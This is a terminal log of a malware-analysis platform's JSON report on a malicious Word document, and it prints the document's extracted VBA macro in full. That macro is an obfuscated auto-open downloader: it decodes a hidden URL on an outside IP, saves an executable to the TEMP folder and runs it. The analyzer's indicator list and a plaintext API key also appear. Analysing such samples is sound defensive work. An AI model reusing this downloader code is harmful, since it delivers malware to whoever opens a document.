1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wOnebkzq As Integer\r\nwOnebkzq = 4\r\nDo While wOnebkzq < 43\r\nDoEvents: wOnebkzq = wOnebkzq + 1\r\nLoop\r\n\r\n    pGYdsfsdf = HexToString(StrReverse(\"078607E2963707F607F2963707F6D6F203830383A32373E27353E2633313E24393F2F2A307474786\"))\r\n\r\nDim zwYMnQTk As Integer\r\n\r\nDim PmIJRXGl As Integer\r\n\r\nDim MWCcfpCe As Integer\r\nMWCcfpCe = 9\r\nDo While MWCcfpCe < 33\r\nDoEvents: MWCcfpCe = MWCcfpCe + 1\r\nLoop\r\n\r\nPmIJRXGl = 7\r\nDo While PmIJRXGl < 79\r\n\r\nDim QCdqXcvU As Integer\r\nQCdqXcvU = 7\r\nDo While QCdqXcvU < 14\r\nDoEvents: QCdqXcvU = QCdqXcvU + 1\r\nLoop\r\n\r\nDoEvents: PmIJRXGl = PmIJRXGl + 1\r\n\r\nDim yvwRfrSx As Integer\r\nyvwRfrSx = 8\r\nDo While yvwRfrSx < 86\r\nDoEvents: yvwRfrSx = yvwRfrSx + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim EKpnDDqb As Integer\r\nEKpnDDqb = 6\r\nDo While EKpnDDqb < 31\r\nDoEvents: EKpnDDqb = EKpnDDqb + 1\r\nLoop\r\n\r\nzwYMnQTk = 1\r\nDo While zwYMnQTk < 48\r\n\r\nDim yVEohnGo As Integer\r\n\r\nDim HlJMAUVN As Integer\r\nHlJMAUVN = 8\r\nDo While HlJMAUVN < 66\r\nDoEvents: HlJMAUVN = HlJMAUVN + 1\r\nLoop\r\n\r\nyVEohnGo = 8\r\nDo While yVEohnGo < 82\r\n\r\nDim lNBkYizK As Integer\r\nlNBkYizK = 4\r\nDo While lNBkYizK < 46\r\nDoEvents: lNBkYizK = lNBkYizK + 1\r\nLoop\r\n\r\nDoEvents: yVEohnGo = yVEohnGo + 1\r\n\r\nDim UhInwGiv As Integer\r\nUhInwGiv = 7\r\nDo While UhInwGiv < 17\r\nDoEvents: UhInwGiv = UhInwGiv + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim CAYUXRFT As Integer\r\nCAYUXRFT = 9\r\nDo While CAYUXRFT < 39\r\nDoEvents: CAYUXRFT = CAYUXRFT + 1\r\nLoop\r\n\r\nDoEvents: zwYMnQTk = zwYMnQTk + 1\r\n\r\nDim QfqTWCPF As Integer\r\n\r\nDim lMRJpfqH As Integer\r\nlMRJpfqH = 2\r\nDo While lMRJpfqH < 21\r\nDoEvents: lMRJpfqH = lMRJpfqH + 1\r\nLoop\r\n\r\nQfqTWCPF = 7\r\nDo While QfqTWCPF < 26\r\n\r\nDim ZCDiSoNa As Integer\r\nZCDiSoNa = 3\r\nDo While ZCDiSoNa < 32\r\nDoEvents: ZCDiSoNa = ZCDiSoNa + 1\r\nLoop\r\n\r\nDoEvents: QfqTWCPF = QfqTWCPF + 1\r\n\r\nDim OeSqbeHr As Integer\r\nOeSqbeHr = 5\r\nDo While OeSqbeHr < 81\r\nDoEvents: OeSqbeHr = OeSqbeHr + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim RUonJglO As Integer\r\nRUonJglO = 4\r\nDo While RUonJglO < 76\r\nDoEvents: RUonJglO = RUonJglO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vFwHMspk As Integer\r\n\r\nDim mJPnrJHi As Integer\r\nmJPnrJHi = 2\r\nDo While mJPnrJHi < 83\r\nDoEvents: mJPnrJHi = mJPnrJHi + 1\r\nLoop\r\n\r\nvFwHMspk = 5\r\nDo While vFwHMspk < 82\r\n\r\nDim odkNcoAJ As Integer\r\nodkNcoAJ = 2\r\nDo While odkNcoAJ < 56\r\nDoEvents: odkNcoAJ = odkNcoAJ + 1\r\nLoop\r\n\r\nDoEvents: vFwHMspk = vFwHMspk + 1\r\n\r\nDim zViDUjMo As Integer\r\nzViDUjMo = 8\r\nDo While zViDUjMo < 82\r\nDoEvents: zViDUjMo = zViDUjMo + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlFdNIYK As Integer\r\nHlFdNIYK = 6\r\nDo While HlFdNIYK < 66\r\nDoEvents: HlFdNIYK = HlFdNIYK + 1\r\nLoop\r\n\r\n    pHUIdsfdsf = Environ(HexToString(\"\"TEMP\"\")) & HexToString(\"\"\\vGJsdfbJHKdsf.exe\"\")\r\n\r\nDim hFBvLczq As Integer\r\n\r\nDim sdGfInUz As Integer\r\n\r\nDim rDzpXTRU As Integer\r\nrDzpXTRU = 8\r\nDo While rDzpXTRU < 27\r\nDoEvents: rDzpXTRU = rDzpXTRU + 1\r\nLoop\r\n\r\nsdGfInUz = 9\r\nDo While sdGfInUz < 94\r\n\r\nDim EGmOFzhs As Integer\r\nEGmOFzhs = 3\r\nDo While EGmOFzhs < 78\r\nDoEvents: EGmOFzhs = EGmOFzhs + 1\r\nLoop\r\n\r\nDoEvents: sdGfInUz = sdGfInUz + 1\r\n\r\nDim GcbhqWoh As Integer\r\nGcbhqWoh = 8\r\nDo While GcbhqWoh < 56\r\nDoEvents: GcbhqWoh = GcbhqWoh + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim wPjNTlzr As Integer\r\nwPjNTlzr = 5\r\nDo While wPjNTlzr < 29\r\nDoEvents: wPjNTlzr = wPjNTlzr + 1\r\nLoop\r\n\r\nhFBvLczq = 1\r\nDo While hFBvLczq < 19\r\n\r\nDim QlJoeeOL As Integer\r\n\r\nDim ijezTJuf As Integer\r\nijezTJuf = 9\r\nDo While ijezTJuf < 95\r\nDoEvents: ijezTJuf = ijezTJuf + 1\r\nLoop\r\n\r\nQlJoeeOL = 7\r\nDo While QlJoeeOL < 55\r\n\r\nDim fIBmsLkO As Integer\r\nfIBmsLkO = 1\r\nDo While fIBmsLkO < 18\r\nDoEvents: fIBmsLkO = fIBmsLkO + 1\r\nLoop\r\n\r\nDoEvents: QlJoeeOL = QlJoeeOL + 1\r\n\r\nDim DFXQHEVD As Integer\r\nDFXQHEVD = 7\r\nDo While DFXQHEVD < 22\r\nDoEvents: DFXQHEVD = DFXQHEVD + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim QBzgcPjf As Integer\r\nQBzgcPjf = 7\r\nDo While QBzgcPjf < 14\r\nDoEvents: QBzgcPjf = QBzgcPjf + 1\r\nLoop\r\n\r\nDoEvents: hFBvLczq = hFBvLczq + 1\r\n\r\nDim QhNwJeIa As Integer\r\n\r\nDim oswDtxNR As Integer\r\noswDtxNR = 2\r\nDo While oswDtxNR < 94\r\nDoEvents: oswDtxNR = oswDtxNR + 1\r\nLoop\r\n\r\nQhNwJeIa = 5\r\nDo While QhNwJeIa < 83\r\n\r\nDim iwAjDRlr As Integer\r\niwAjDRlr = 2\r\nDo While iwAjDRlr < 96\r\nDoEvents: iwAjDRlr = iwAjDRlr + 1\r\nLoop\r\n\r\nDoEvents: QhNwJeIa = QhNwJeIa + 1\r\n\r\nDim bhNxFgJB As Integer\r\nbhNxFgJB = 3\r\nDo While bhNxFgJB < 63\r\nDoEvents: bhNxFgJB = bhNxFgJB + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim puKNWZql As Integer\r\npuKNWZql = 9\r\nDo While puKNWZql < 65\r\nDoEvents: puKNWZql = puKNWZql + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vHqYHkuR As Integer\r\n\r\nDim RQQvzlzC As Integer\r\nRQQvzlzC = 6\r\nDo While RQQvzlzC < 91\r\nDoEvents: RQQvzlzC = RQQvzlzC + 1\r\nLoop\r\n\r\nvHqYHkuR = 3\r\nDo While vHqYHkuR < 68\r\n\r\nDim ikLXyMyH As Integer\r\nikLXyMyH = 2\r\nDo While ikLXyMyH < 57\r\nDoEvents: ikLXyMyH = ikLXyMyH + 1\r\nLoop\r\n\r\nDoEvents: vHqYHkuR = vHqYHkuR + 1\r\n\r\nDim lBVAEDVM As Integer\r\nlBVAEDVM = 2\r\nDo While lBVAEDVM < 22\r\nDoEvents: lBVAEDVM = lBVAEDVM + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim OsCIrZRa As Integer\r\nOsCIrZRa = 4\r\nDo While OsCIrZRa < 44\r\nDoEvents: OsCIrZRa = OsCIrZRa + 1\r\nLoop\r\n\r\n    DDdsfF = URLDownloadToFile(0&, pGYdsfsdf, pHUIdsfdsf, 0&, 0&)\r\n   Dim eFdsgfsdf\r\n\r\nDim VDeuoDvD As Integer\r\n\r\nDim ZgUWsgJz As Integer\r\n\r\nDim ZeuzzfOu As Integer\r\nZeuzzfOu = 6\r\nDo While ZeuzzfOu < 33\r\nDoEvents: ZeuzzfOu = ZeuzzfOu + 1\r\nLoop\r\n\r\nZgUWsgJz = 6\r\nDo While ZgUWsgJz < 97\r\n\r\nDim QaQIVqOv As Integer\r\nQaQIVqOv = 7\r\nDo While QaQIVqOv < 76\r\nDoEvents: QaQIVqOv = QaQIVqOv + 1\r\nLoop\r\n\r\nDoEvents: ZgUWsgJz = ZgUWsgJz + 1\r\n\r\nDim GnavwpPU As Integer\r\nGnavwpPU = 8\r\nDo While GnavwpPU < 29\r\nDoEvents: GnavwpPU = GnavwpPU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim HlQRwtjO As Integer\r\nHlQRwtjO = 8\r\nDo While HlQRwtjO < 27\r\nDoEvents: HlQRwtjO = HlQRwtjO + 1\r\nLoop\r\n\r\nVDeuoDvD = 7\r\nDo While VDeuoDvD < 79\r\n\r\nDim FBbbetwi As Integer\r\n\r\nDim lymMAHNo As Integer\r\nlymMAHNo = 4\r\nDo While lymMAHNo < 75\r\nDoEvents: lymMAHNo = lymMAHNo + 1\r\nLoop\r\n\r\nFBbbetwi = 8\r\nDo While FBbbetwi < 24\r\n\r\nDim NfILghyz As Integer\r\nNfILghyz = 7\r\nDo While NfILghyz < 23\r\nDoEvents: NfILghyz = NfILghyz + 1\r\nLoop\r\n\r\nDoEvents: FBbbetwi = FBbbetwi + 1\r\n\r\nDim PtwKRQrO As Integer\r\nPtwKRQrO = 7\r\nDo While PtwKRQrO < 53\r\nDoEvents: PtwKRQrO = PtwKRQrO + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim vvizMpkS As Integer\r\nvvizMpkS = 5\r\nDo While vvizMpkS < 37\r\nDoEvents: vvizMpkS = vvizMpkS + 1\r\nLoop\r\n\r\nDoEvents: VDeuoDvD = VDeuoDvD + 1\r\n\r\nDim IOhddfFb As Integer\r\n\r\nDim IjlqBqEk As Integer\r\nIjlqBqEk = 4\r\nDo While IjlqBqEk < 17\r\nDoEvents: IjlqBqEk = IjlqBqEk + 1\r\nLoop\r\n\r\nIOhddfFb = 4\r\nDo While IOhddfFb < 48\r\n\r\nDim XJrlRuTO As Integer\r\nXJrlRuTO = 9\r\nDo While XJrlRuTO < 32\r\nDoEvents: XJrlRuTO = XJrlRuTO + 1\r\nLoop\r\n\r\nDoEvents: IOhddfFb = IOhddfFb + 1\r\n\r\nDim SWqLclou As Integer\r\nSWqLclou = 5\r\nDo While SWqLclou < 51\r\nDoEvents: SWqLclou = SWqLclou + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim JhaAudJp As Integer\r\nJhaAudJp = 6\r\nDo While JhaAudJp < 65\r\nDoEvents: JhaAudJp = JhaAudJp + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim MkfbadWB As Integer\r\n\r\nDim odqFViLK As Integer\r\nodqFViLK = 9\r\nDo While odqFViLK < 94\r\nDoEvents: odqFViLK = odqFViLK + 1\r\nLoop\r\n\r\nMkfbadWB = 6\r\nDo While MkfbadWB < 65\r\n\r\nDim apCHacUZ As Integer\r\napCHacUZ = 1\r\nDo While apCHacUZ < 84\r\nDoEvents: apCHacUZ = apCHacUZ + 1\r\nLoop\r\n\r\nDoEvents: MkfbadWB = MkfbadWB + 1\r\n\r\nDim RLWNjBSf As Integer\r\nRLWNjBSf = 4\r\nDo While RLWNjBSf < 78\r\nDoEvents: RLWNjBSf = RLWNjBSf + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim olRwDPRY As Integer\r\nolRwDPRY = 9\r\nDo While olRwDPRY < 34\r\nDoEvents: olRwDPRY = olRwDPRY + 1\r\nLoop\r\n\r\n    eFdsgfsdf = Shell(pHUIdsfdsf, 1)\r\n\r\nEnd Sub\r\n\r\n\r\n\r\nPublic Function HexToString(ByVal hextext As String) As String\r\n\r\nDim yrHIysow As Integer\r\n\r\nDim gnIDaadL As Integer\r\ngnIDaadL = 3\r\nDo While gnIDaadL < 79\r\nDoEvents: gnIDaadL = gnIDaadL + 1\r\nLoop\r\n\r\nyrHIysow = 8\r\nDo While yrHIysow < 31\r\n\r\nDim leQnLCBe As Integer\r\nleQnLCBe = 4\r\nDo While leQnLCBe < 74\r\nDoEvents: leQnLCBe = leQnLCBe + 1\r\nLoop\r\n\r\nDoEvents: yrHIysow = yrHIysow + 1\r\n\r\nDim WHdmHwKU As Integer\r\nWHdmHwKU = 7\r\nDo While WHdmHwKU < 61\r\nDoEvents: WHdmHwKU = WHdmHwKU + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim KqnlOcDW As Integer\r\nKqnlOcDW = 8\r\nDo While KqnlOcDW < 64\r\nDoEvents: KqnlOcDW = KqnlOcDW + 1\r\nLoop\r\n\r\n    \r\nFor y = 1 To Len(hextext)\r\n\r\nDim jLdCENAm As Integer\r\n\r\nDim jjvbfVbM As Integer\r\njjvbfVbM = 4\r\nDo While jjvbfVbM < 15\r\nDoEvents: jjvbfVbM = jjvbfVbM + 1\r\nLoop\r\n\r\njLdCENAm = 1\r\nDo While jLdCENAm < 48\r\n\r\nDim uclCAiGl As Integer\r\nuclCAiGl = 2\r\nDo While uclCAiGl < 21\r\nDoEvents: uclCAiGl = uclCAiGl + 1\r\nLoop\r\n\r\nDoEvents: jLdCENAm = jLdCENAm + 1\r\n\r\nDim ArtabSHa As Integer\r\nArtabSHa = 6\r\nDo While ArtabSHa < 95\r\nDoEvents: ArtabSHa = ArtabSHa + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim kqBbDXyb As Integer\r\nkqBbDXyb = 4\r\nDo While kqBbDXyb < 76\r\nDoEvents: kqBbDXyb = kqBbDXyb + 1\r\nLoop\r\n\r\n    num = Mid(hextext, y, 2)\r\n\r\nDim RsTnWSCf As Integer\r\n\r\nDim wHGsaHRO As Integer\r\nwHGsaHRO = 2\r\nDo While wHGsaHRO < 21\r\nDoEvents: wHGsaHRO = wHGsaHRO + 1\r\nLoop\r\n\r\nRsTnWSCf = 6\r\nDo While RsTnWSCf < 44\r\n\r\nDim CZnlQgxw As Integer\r\nCZnlQgxw = 7\r\nDo While CZnlQgxw < 77\r\nDoEvents: CZnlQgxw = CZnlQgxw + 1\r\nLoop\r\n\r\nDoEvents: RsTnWSCf = RsTnWSCf + 1\r\n\r\nDim kiscIKct As Integer\r\nkiscIKct = 2\r\nDo While kiscIKct < 52\r\nDoEvents: kiscIKct = kiscIKct + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DSiGmxcW As Integer\r\nDSiGmxcW = 5\r\nDo While DSiGmxcW < 87\r\nDoEvents: DSiGmxcW = DSiGmxcW + 1\r\nLoop\r\n\r\n    Value = Value & Chr(CDbl(\"&h\" & num))\r\n\r\nDim uNumKpHK As Integer\r\n\r\nDim ofdmMawK As Integer\r\nofdmMawK = 2\r\nDo While ofdmMawK < 95\r\nDoEvents: ofdmMawK = ofdmMawK + 1\r\nLoop\r\n\r\nuNumKpHK = 9\r\nDo While uNumKpHK < 39\r\n\r\nDim EJiSYRwI As Integer\r\nEJiSYRwI = 6\r\nDo While EJiSYRwI < 64\r\nDoEvents: EJiSYRwI = EJiSYRwI + 1\r\nLoop\r\n\r\nDoEvents: uNumKpHK = uNumKpHK + 1\r\n\r\nDim PeQbNxNT As Integer\r\nPeQbNxNT = 7\r\nDo While PeQbNxNT < 14\r\nDoEvents: PeQbNxNT = PeQbNxNT + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim tYYJQaNw As Integer\r\ntYYJQaNw = 2\r\nDo While tYYJQaNw < 51\r\nDoEvents: tYYJQaNw = tYYJQaNw + 1\r\nLoop\r\n\r\n    y = y + 1\r\nNext y\r\n\r\n\r\nDim kDSCrVuB As Integer\r\n\r\nDim noOImZIA As Integer\r\nnoOImZIA = 3\r\nDo While noOImZIA < 34\r\nDoEvents: noOImZIA = noOImZIA + 1\r\nLoop\r\n\r\nkDSCrVuB = 4\r\nDo While kDSCrVuB < 44\r\n\r\nDim FRGpidHw As Integer\r\nFRGpidHw = 8\r\nDo While FRGpidHw < 58\r\nDoEvents: FRGpidHw = FRGpidHw + 1\r\nLoop\r\n\r\nDoEvents: kDSCrVuB = kDSCrVuB + 1\r\n\r\nDim FZBcXdGZ As Integer\r\nFZBcXdGZ = 5\r\nDo While FZBcXdGZ < 95\r\nDoEvents: FZBcXdGZ = FZBcXdGZ + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim zVtNICCx As Integer\r\nzVtNICCx = 8\r\nDo While zVtNICCx < 29\r\nDoEvents: zVtNICCx = zVtNICCx + 1\r\nLoop\r\n\r\nHexToString = Value\r\nEnd Function\r\n\r\n\r\n\n",
        "analysis": {
          "VBA String": [],
          "Dridex String": [],
          "Suspicious": [
            [
              "Hex Strings",
              "Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)"
            ],
            [
              "Chr",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "StrReverse",
              "May attempt to obfuscate specific strings (use option --deobf to deobfuscate)"
            ],
            [
              "Shell",
              "May run an executable file or a system command"
            ],
            [
              "Environ",
              "May read system environment variables"
            ],
            [
              "URLDownloadToFileA",
              "May download files from the Internet"
            ],
            [
              "Lib",
              "May run code from a DLL"
            ]
          ],
          "Hex String": [
            [
              "\\vGJsdfbJHKdsf.exe",
              "5C76474A736466624A484B6473662E657865"
            ],
            [
              "TEMP",
              "54454D50"
            ]
          ],
          "Form String": [],
          "Base64 String": [],
          "AutoExec": [
            [
              "Workbook_Open",
              "Runs when the Excel Workbook is opened"
            ],
            [
              "AutoOpen",
              "Runs when the Word document is opened"
            ]
          ],
          "IOC": [
            [
              "94.136.57.72",
              "IPv4 address (obfuscation: StrReverse+Hex)"
            ],
            [
              "vGJsdfbJHKdsf.exe",
              "Executable file name (obfuscation: Hex)"
            ],
            [
              "http://94.136.57.72:8080/mopsi/popsi.php",
              "URL (obfuscation: StrReverse+Hex)"
            ]
          ]
        }
      }
    },
    "module": null,
    "date": {
      "$date": 1490354278607
    },
    "file": {
      "owners": [
        "cert",
        "*"
      ],
      "sha1": "d34317a440d28aaa4a4d7a480dbb89f15fa015bf",
      "names": [
        "DEC2248QO.doc"
      ],
      "probable_names": [],
      "parent_analyses": [],
      "antivirus": {},
      "sha256": "097d1b970439b86467bfae966d18f557b1b908e530902253b24c4180458f51e1",
      "detailed_type": "Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Code page: 1251, Author: 1, Template: Normal, Revision Number: 12, Name of Creating Application: Microsoft Office Word, Total Editing Time: 10:00, Create Time/Date: Mon Nov 24 10:22:00 2014, Last Saved Time/Date: Tue Jan 13 06:25:00 2015, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0",
      "mime": "application/msword",
      "analysis": [
        {
          "$oid": "58d4f256014ed28a5d50c113"
        }
      ],
      "groups": [
        "cert",
        "*"
      ],
      "_id": {
        "$oid": "58d4f256014ed28a5d50c112"
      },
      "type": "word",
      "md5": "757e9b7209f0d6ef3cf7bfd904445009"
    },
    "iocs": [],
    "executed_modules": [
      "office_macros"
    ],
    "probable_names": [],
    "extracted_files": [],
    "status": "finished",
    "tags": [
      "office_macros"
    ],
    "groups": [
      "cert",
      "*"
    ],
    "pending_modules": [],
    "analyst": {
      "$oid": "58d4e81b014ed25aaa77fabf"
    },
    "waiting_modules": [],
    "canceled_modules": [],
    "threat_intelligence": {},
    "generated_files": {},
    "_id": {
      "$oid": "58d4f256014ed28a5d50c113"
    },
    "options": {}
  }
}
circl@cpg:~/build/fame$ curl -X GET -H "Content-type: application/json" -H "Accept: application/json" -H "X-API-KEY: 8b1958858cdaf80ac55e17a26eca3cc2dd17ab2a88b0ab5ee646cdce20d966441aa55fbfbad45d62" http://localhost:4200/analyses/58d4f256014ed28a5d50c113|jq|pbcopy
jq - commandline JSON processor [version 1.5-1-a5b5cbe]
Usage: jq [options] <jq filter> [file...]

	jq is a tool for processing JSON inputs, applying the
	given filter to its JSON text inputs and producing the
	filter's results as JSON on standard output.
	The simplest filter is ., which is the identity filter,
	copying jq's input to its output unmodified (except for
	formatting).
	For more advanced filters see the jq(1) manpage ("man jq")
	and/or https://stedolan.github.io/jq

	Some of the options include:
	 -c		compact instead of pretty-printed output;
	 -n		use `null` as the single input value;
	 -e		set the exit status code based on the output;
	 -s		read (slurp) all inputs into an array; apply filter to it;
	 -r		output raw strings, not JSON texts;
	 -R		read raw strings, not JSON texts;
	 -C		colorize JSON;
	 -M		monochrome (don't colorize JSON);
	 -S		sort keys of objects on output;
	 --tab	use tabs for indentation;
	 --arg a v	set variable $a to value <v>;
	 --argjson a v	set variable $a to JSON value <v>;
	 --slurpfile a f	set variable $a to an array of JSON texts read from <f>;
	See the manpage for more options.
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 64 25677   64 16384    0     0  1190k      0 --:--:-- --:--:-- --:--:-- 1230k
curl: (23) Failed writing body (0 != 16384)
No command 'pbcopy' found, did you mean:
 Command 'bcopy' from package 'bacula-sd-sqlite3' (universe)
 Command 'bcopy' from package 'bacula-sd-pgsql' (universe)
 Command 'bcopy' from package 'bacula-sd-mysql' (universe)
 Command 'bcopy' from package 'bareos-tools' (universe)
pbcopy: command not found
circl@cpg:~/build/fame$ curl -X GET -H "Content-type: application/json" -H "Accept: application/json" -H "X-API-KEY: 8b1958858cdaf80ac55e17a26eca3cc2dd17ab2a88b0ab5ee646cdce20d966441aa55fbfbad45d62" http://localhost:4200/analyses/58d4f256014ed28a5d50c113|jq
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 25677  100 25677    0     0  2187k      0 --:--:-- --:--:-- --:--:-- 2279k
{
  "analysis": {
    "support_files": {},
    "logs": [
      "2017-03-24 11:17: debug: Trying to queue module 'apk'",
      "2017-03-24 11:17: debug: Trying to queue module 'eml'",
      "2017-03-24 11:17: debug: Trying to queue module 'office_macros'",
      "2017-03-24 11:17: debug: Trying to queue module 'pdf'",
      "2017-03-24 11:17: debug: Trying to queue module 'zip'",
      "2017-03-24 11:17: debug: Trying to queue module 'bamfdetect'",
      "2017-03-24 11:17: debug: Trying to run office_macros",
      "2017-03-24 11:17: debug: Done with office_macros"
    ],
    "extractions": [],
    "results": {
      "office_macros": {
        "macros": "Attribute VB_Name = \"ThisDocument\"\r\nAttribute VB_Base = \"1Normal.ThisDocument\"\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\n#If VBA7 Then\r\n    Private Declare PtrSafe Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As LongPtr, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As LongPtr) As LongPtr\r\n#Else\r\n    Private Declare Function URLDownloadToFile Lib \"urlmon\" Alias _\r\n    \"URLDownloadToFileA\" (ByVal pCaller As Long, _\r\n    ByVal szURL As String, _\r\n    ByVal szFileName As String, _\r\n    ByVal dwReserved As Long, _\r\n    ByVal lpfnCB As Long) As Long\r\n#End If\r\n\r\n\r\nSub FUJdsfFF()\r\n\r\nDim onOImAGL As Integer\r\n\r\nDim gVrscpjD As Integer\r\n\r\nDim hHOWWjbQ As Integer\r\nhHOWWjbQ = 1\r\nDo While hHOWWjbQ < 72\r\nDoEvents: hHOWWjbQ = hHOWWjbQ + 1\r\nLoop\r\n\r\ngVrscpjD = 3\r\nDo While gVrscpjD < 12\r\n\r\nDim llSODdsW As Integer\r\nllSODdsW = 4\r\nDo While llSODdsW < 77\r\nDoEvents: llSODdsW = llSODdsW + 1\r\nLoop\r\n\r\nDoEvents: gVrscpjD = gVrscpjD + 1\r\n\r\nDim elUrgZPg As Integer\r\nelUrgZPg = 8\r\nDo While elUrgZPg < 86\r\nDoEvents: elUrgZPg = elUrgZPg + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim LnAAEDND As Integer\r\nLnAAEDND = 6\r\nDo While LnAAEDND < 67\r\nDoEvents: LnAAEDND = LnAAEDND + 1\r\nLoop\r\n\r\nonOImAGL = 2\r\nDo While onOImAGL < 69\r\n\r\nDim ttVOSmYq As Integer\r\n\r\nDim lAXCAjVL As Integer\r\nlAXCAjVL = 2\r\nDo While lAXCAjVL < 27\r\nDoEvents: lAXCAjVL = lAXCAjVL + 1\r\nLoop\r\n\r\nttVOSmYq = 2\r\nDo While ttVOSmYq < 83\r\n\r\nDim anNRJYwm As Integer\r\nanNRJYwm = 1\r\nDo While anNRJYwm < 87\r\nDoEvents: anNRJYwm = anNRJYwm + 1\r\nLoop\r\n\r\nDoEvents: ttVOSmYq = ttVOSmYq + 1\r\n\r\nDim EgAvDrgN As Integer\r\nEgAvDrgN = 3\r\nDo While EgAvDrgN < 73\r\nDoEvents: EgAvDrgN = EgAvDrgN + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim BGFxWEBE As Integer\r\nBGFxWEBE = 7\r\nDo While BGFxWEBE < 18\r\nDoEvents: BGFxWEBE = BGFxWEBE + 1\r\nLoop\r\n\r\nDoEvents: onOImAGL = onOImAGL + 1\r\n\r\nDim YLbEILbH As Integer\r\n\r\nDim USzkBLms As Integer\r\nUSzkBLms = 7\r\nDo While USzkBLms < 74\r\nDoEvents: USzkBLms = USzkBLms + 1\r\nLoop\r\n\r\nYLbEILbH = 4\r\nDo While YLbEILbH < 78\r\n\r\nDim kYEgOsrM As Integer\r\nkYEgOsrM = 1\r\nDo While kYEgOsrM < 18\r\nDoEvents: kYEgOsrM = kYEgOsrM + 1\r\nLoop\r\n\r\nDoEvents: YLbEILbH = YLbEILbH + 1\r\n\r\nDim kRSZcdez As Integer\r\nkRSZcdez = 4\r\nDo While kRSZcdez < 79\r\nDoEvents: kRSZcdez = kRSZcdez + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiIMoHeK As Integer\r\nDiIMoHeK = 7\r\nDo While DiIMoHeK < 25\r\nDoEvents: DiIMoHeK = DiIMoHeK + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim hFWJmrYt As Integer\r\n\r\nDim EqXLaagR As Integer\r\nEqXLaagR = 3\r\nDo While EqXLaagR < 72\r\nDoEvents: EqXLaagR = EqXLaagR + 1\r\nLoop\r\n\r\nhFWJmrYt = 1\r\nDo While hFWJmrYt < 72\r\n\r\nDim QgtpZXeG As Integer\r\nQgtpZXeG = 5\r\nDo While QgtpZXeG < 83\r\nDoEvents: QgtpZXeG = QgtpZXeG + 1\r\nLoop\r\n\r\nDoEvents: hFWJmrYt = hFWJmrYt + 1\r\n\r\nDim KbUCXFUS As Integer\r\nKbUCXFUS = 8\r\nDo While KbUCXFUS < 67\r\nDoEvents: KbUCXFUS = KbUCXFUS + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim DiUVMCVs As Integer\r\nDiUVMCVs = 7\r\nDo While DiUVMCVs < 54\r\nDoEvents: DiUVMCVs = DiUVMCVs + 1\r\nLoop\r\n\r\npHUgdsf\r\nEnd Sub\r\nSub AutoOpen()\r\n\r\nDim GHfjoXwI As Integer\r\n\r\nDim RrEuvFPw As Integer\r\n\r\nDim jOgmvxII As Integer\r\njOgmvxII = 4\r\nDo While jOgmvxII < 71\r\nDoEvents: jOgmvxII = jOgmvxII + 1\r\nLoop\r\n\r\nRrEuvFPw = 4\r\nDo While RrEuvFPw < 43\r\n\r\nDim rpbTcQis As Integer\r\nrpbTcQis = 1\r\nDo While rpbTcQis < 56\r\nDoEvents: rpbTcQis = rpbTcQis + 1\r\nLoop\r\n\r\nDoEvents: RrEuvFPw = RrEuvFPw + 1\r\n\r\nDim kEKoHcEt As Integer\r\nkEKoHcEt = 1\r\nDo While kEKoHcEt < 17\r\nDoEvents: kEKoHcEt = kEKoHcEt + 1\r\nLoop\r\n\r\nLoop\r\n\r\n\r\nDim trzlGSeU As Integer\r\ntrzlGSeU = 2\r\nDo While trzlGSeU < 83\r\nDoEvents: trzlGSeU = trzlGSeU + 1\r\nLoop\r\n\r\nGHfjoXwI = 8\r\nDo While GHfjoXwI < 51\r\n\r\nDim fVrtiule As Integer\r\n\r\nDim QkHgluUE As Integer\r\nQkHgluUE = 7\r\nDo While QkHgluUE < 55\r\nDoEvents: QkHgluUE = QkHgluUE + 1\r\nLoop\r\n\r\nfVrtiule = 1\r\nDo While fVrtiule < 12\r\n\r\nDim kTUBSEnj As Integer\r\nkTUBSEnj = 4\r\nDo While kTUBSEnj < 42\r\nDoEvents: kTUBSEnj = kTUBSEnj + 1\r\nLoop\r\n\r\nDoEvents: fVrtiule = fVrtiule + 1\r\n\r\nDim vHqDywtf As Integer\r\nvHqDywtf = 5\r\nDo While vHqDywtf < 